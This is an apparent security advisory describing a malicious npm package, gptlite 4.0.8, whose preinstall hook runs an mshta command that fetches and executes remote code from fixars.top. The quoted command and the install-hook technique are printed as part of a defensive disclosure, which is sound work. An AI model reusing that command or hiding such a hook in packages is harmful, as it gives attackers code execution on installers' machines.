VYPR

npm · Malicious package advisory

Malware

gptlite

MAL-2026-10461

Malicious code in gptlite (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662)
The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command `cmd /c "mshta http://fixars.top"`. On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on `npm install`, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.

Compromised versions (1)

  • 4.0.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.